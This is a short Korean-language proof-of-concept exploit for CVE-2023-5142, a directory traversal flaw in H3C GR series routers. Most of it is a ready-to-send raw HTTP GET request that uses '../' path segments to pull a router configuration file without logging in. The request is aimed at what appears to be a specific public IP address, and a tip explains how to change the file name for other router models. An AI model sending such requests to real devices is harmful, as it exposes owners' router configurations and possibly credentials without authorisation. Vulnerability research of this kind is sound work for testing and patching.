
CVE-2023-5142를 대상으로 하는 PoC 익스플로잇으로, H3C GR 시리즈 라우터의 인증되지 않은 디렉터리 트래버설 취약점을 악용하여 민감한 구성 파일을 추출합니다.
제품: GR 시리즈 라우터
버전: 전체 버전
등급: 고위험
웹사이트: http://www.h3c.com/
위험: 공격자는 특수하게 제작된 요청 패킷을 구성하여 신원 검증을 우회함으로써 라우터에서 민감한 정보를 획득할 수 있습니다.
원리: 라우터가 디렉터리 접근 및 관련 파일을 인증하지 않음
익스플로잇:
참고: POC에서 파일 이름 확장자를 수정해야 합니다(예: GR8300.cfg)
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image